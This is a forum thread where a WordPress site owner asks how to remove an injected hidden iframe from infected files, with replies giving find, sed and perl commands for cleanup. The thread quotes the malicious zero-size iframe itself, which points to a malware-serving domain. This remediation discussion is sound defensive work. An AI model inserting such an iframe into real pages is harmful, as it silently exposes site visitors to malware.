[resolved] iframe injection - how to "search and replace" all the files ? (3 posts)

  1. talgalili
    Member
    Posted 5 years ago #

    Hi all.

    I am seeking help from someone who knows how to use perl with SSH - in order to repair files that were damaged by a malicious hacking bot.
    (one site that I have infected is, for example: http://www.talgalili.com)

    Here is the code that I wish to remove:

    <iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    (leading to a malware link - which Avast detected)

    Using SSH, I now wish to search and replace all the files that have this line and erase that piece of code from them.
    I found this post:
    http://fieldsmarshall.com/htmliframe-inf-wordpress-infection/
    Explaining how to do so using this code:
    find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'

    I would like to customize this code to erase exactly the piece of code mentioned, and not the whole line in which it resides.
    Any idea on how to do this ?

    Thanks,
    Tal

    p.s: a few other threads on the subject can be found at:
    http://wordpress.org/support/topic/271811?replies=2
    http://wordpress.org/support/topic/281767?replies=3
    http://wordpress.org/support/topic/277277?replies=7
    but the code those people present is, I am afraid, too general

  2. eburcat
    Member
    Posted 5 years ago #

    BACK UP YOUR FILES BEFORE YOU TRY THIS.
    Also, test your script before you actually run it on your production files!

    You can run:
    sed 's/string to be replaced/the replacement string/' < input.html > output.html

    If you need to escape a "/" in the "string to be replaced" part, you can use: '\/'.

    So, in your case, it's something like:

    sed 's/<iframe src="http:\/\/m-analytics.net\/qaqa\/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' < a.html > b.html

    Another option is to scp the files to your desktop, run a search and replace with your favorite multi-file text editor, and scp the files back.

    I hope it helps...

  3. talgalili
    Member
    Posted 5 years ago #

    Thank you Eburcat.
    I eventually solved the problem and thought it would be nice to share the code I used with everyone else:

    find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/m-analytics.net\/qaqa\/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

    p.s: I used PuTTY for the SSH, but several times had to do it again, since it crashed while doing some of the work (although it crashed less than WinSCP).

    p.p.s: if you are new to WordPress, run, read, and install the security plugins mentioned here:
    http://weblogtoolscollection.com/archives/2009/06/15/security-and-anti-spam-plugins-for-wordpress/

    Cheers,
    Tal
